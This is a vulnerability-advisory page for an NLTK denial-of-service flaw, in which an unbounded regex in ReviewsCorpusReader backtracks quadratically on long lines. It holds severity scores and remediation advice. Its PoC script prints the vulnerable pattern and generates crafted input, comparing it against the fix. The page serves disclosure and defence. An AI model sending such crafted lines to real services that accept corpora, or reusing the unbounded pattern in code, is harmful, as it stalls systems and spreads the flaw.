Skip to main content

NLTK CVE-2026-12061

HIGH
Inefficient Regular Expression Complexity (ReDoS) (CWE-1333)
2026-07-31 https://github.com/nltk/nltk GHSA-fg7f-2386-8897
7.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.5 HIGH
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
vuln.today AI
7.5 HIGH

Network vector applies when corpus intake is user-supplied over network; PR:N as no library-level auth exists; A:H for indefinite CPU hang; C/I both N.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
SUSE
HIGH
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jul 31, 2026 - 17:17 vuln.today
Analysis Generated
Jul 31, 2026 - 17:17 vuln.today
CVE Published
Jul 31, 2026 - 16:51 github-advisory
HIGH 7.5

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 7 pypi packages depend on nltk (6 direct, 1 indirect)

Ecosystem-wide dependent count for version 3.10.0.

DescriptionGitHub Advisory

Summary

ReviewsCorpusReader extracts feature annotations of the form *label* followed by a bracketed signed digit (e.g. a label then [+2]) from each review line, using the module-level FEATURES regex. The feature-label sub-pattern is unbounded - an optional greedy run of word-plus-whitespace groups followed by another word, which must then be followed by a literal [. On a long bracket-less line the label can match from every search position to the end of the line, causing quadratic backtracking. A single crafted line in a reviews corpus hangs reviews(), features(), and sents().

Details

The label alternative is a greedy, unanchored run of word-plus-whitespace groups followed by a word, which must then be followed by a literal [. On an input that is a long sequence of word-plus-whitespace with no bracket, at each of the *n* starting positions the engine greedily extends the label to the end of the line, only then fails to find the bracket, and backtracks the whole way. re.findall repeats this from every position, giving O(n²) total work. There is no exponential blow-up, but quadratic growth on an attacker-controlled line length is enough to hang the reader: a single line of ~100,000 words consumes CPU for tens of seconds to minutes.

PoC

import multiprocessing as mp
import re
import time
# --- The vulnerable regex, verbatim from nltk/corpus/reader/reviews.py L70-71 ---
FEATURES_VULN = re.compile(r"((?:(?:\w+\s)+)?\w+)\[((?:\+|\-)\d)\]")
# --- Bounded variant from the fix (PR #3583): cap the per-label word run.
#     A generous bound (real feature labels are short noun phrases) makes the
#     run linear while never affecting legitimate corpora. ---
WORD_BOUND = 50
FEATURES_FIXED = re.compile(
    r"((?:(?:\w+\s){0,%d})?\w+)\[((?:\+|\-)\d)\]" % WORD_BOUND
)

TIMEOUT = 20.0
# seconds, per measurement
SIZES = [1000, 2000, 4000, 8000, 16000]
# words on a single bracket-less line


def _bad_line(n_words):
    """A long line of plain words with NO trailing bracketed annotation."""
    return ("word " * n_words).rstrip()


def _worker(pattern_str, line, q):
    pat = re.compile(pattern_str)
    t0 = time.perf_counter()
    pat.findall(line)
    q.put(time.perf_counter() - t0)


def timed_findall(pattern, line, timeout=TIMEOUT):
    """Run pattern.findall(line) in a killable process; return seconds or None (timeout)."""
    q = mp.Queue()
    p = mp.Process(target=_worker, args=(pattern.pattern, line, q))
    p.start()
    p.join(timeout)
    if p.is_alive():
        p.terminate()
        p.join()
        return None
    return q.get() if not q.empty() else None


def bench(label, pattern):
    print(f"\n[{label}]  pattern: {pattern.pattern}")
    print(f"  {'words':>7} {'~bytes':>8}   {'time':>12}   {'x prev':>7}")
    prev = None
    for n in SIZES:
        line = _bad_line(n)
        t = timed_findall(pattern, line)
        if t is None:
            print(f"  {n:>7} {len(line):>8}   {'>%.0fs TIMEOUT' % TIMEOUT:>12}   {'--':>7}")
            prev = None
        else:
            ratio = f"{t/prev:.1f}x" if prev else "--"
            print(f"  {n:>7} {len(line):>8}   {t*1000:>9.1f} ms   {ratio:>7}")
            prev = t


def parity_check():
    """The bound must NOT change extraction on a realistic annotated line."""
    real = (
        "the picture quality[+2] and battery life[+1] are great but "
        "the lens cap[-1] feels cheap and the menu system[-2] is slow"
    )
    a = FEATURES_VULN.findall(real)
    b = FEATURES_FIXED.findall(real)
    print("\n[parity] realistic annotated line - extraction must be identical")
    print(f"  vulnerable regex -> {a}")
    print(f"  bounded   regex  -> {b}")
    print(f"  identical: {a == b}")
    return a == b


def main():
    print("=" * 66)
    print(" NLTK ReviewsCorpusReader FEATURES ReDoS PoC (quadratic backtracking)")
    print("=" * 66)
    print(f" per-call timeout = {TIMEOUT:.0f}s   word bound (fix) = {WORD_BOUND}")

    bench("VULNERABLE  reviews.py L70-71", FEATURES_VULN)
    bench("BOUNDED     fix #3583", FEATURES_FIXED)
    same = parity_check()

    print("\n" + "=" * 66)
    print(" Vulnerable: ~4x time per input doubling  => O(n^2) quadratic ReDoS")
    print(" Bounded:    ~2x time per input doubling  => O(n)   linear, stays in ms")
    print(f" Extraction parity on real annotations preserved: {same}")
    print(" A single ~100k-word bracket-less review line hangs reviews()/features()/sents().")
    print("=" * 66)


if __name__ == "__main__":
    main()

Impact

Denial of service. Processing a single crafted line through ReviewsCorpusReader consumes CPU quadratically in the line length, hanging the calling thread or process. An application that loads an untrusted or user-supplied reviews corpus (multi-tenant pipelines, services that accept user-provided corpora, batch or CI jobs) can be stalled by one malicious line, with no authentication and no privileges required.

AnalysisAI

Quadratic ReDoS in NLTK ReviewsCorpusReader allows an unauthenticated attacker to hang any application that processes untrusted reviews corpora, by supplying a single crafted line of approximately 100,000 bracket-less words. All NLTK versions through 3.9.4 are affected; the calls reviews(), features(), and sents() are all vulnerable entry points. Publicly available exploit code (PoC) is included in the advisory; no confirmed active exploitation in CISA KEV at time of analysis.

Technical ContextAI

NLTK's ReviewsCorpusReader uses a module-level FEATURES regex defined in nltk/corpus/reader/reviews.py (lines 70-71) to extract feature annotations of the form label[+N] or label[-N] from corpus lines. The regex pattern ((?:(?:\w+\s)+)?\w+)\[((?:\+|\-)\d)\] contains an unbounded greedy label sub-pattern: an optional run of word-plus-whitespace groups followed by a word, which must then be followed by a literal bracket. Python's backtracking NFA regex engine, at each of n starting positions in a bracket-less line, greedily extends the match to end-of-line, fails to find the required '[', and backtracks the full distance. re.findall repeats this from every position, yielding O(n²) total CPU work - quadratic growth rather than exponential, but sufficient to stall processing. CWE-1333 (Inefficient Regular Expression Complexity) precisely describes this root cause. The affected package is pkg:pip/nltk.

RemediationAI

Upgrade NLTK to version 3.10.0 or later using pip install --upgrade nltk; this version introduces a bounded repeat quantifier in the FEATURES regex (PR #3583), capping the per-label word run to 50 iterations and resolving the quadratic backtracking while preserving extraction parity on all legitimate annotated corpora. If immediate upgrade is blocked, applications that accept user-supplied corpora should enforce a maximum line-length limit before passing content to ReviewsCorpusReader - rejecting or truncating lines exceeding a safe threshold (e.g., 10,000 characters) eliminates the attack surface with no functional impact on real review data. Alternatively, if ReviewsCorpusReader is not a required feature, disabling or removing its use entirely is a zero-risk workaround. The full advisory is at https://github.com/nltk/nltk/security/advisories/GHSA-fg7f-2386-8897.

Vendor StatusVendor

SUSE

Severity: Important
Product Status
SUSE Package Hub 15 SP7 Fixed
SUSE Package Hub 15 SP7 Affected

Share

CVE-2026-12061 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy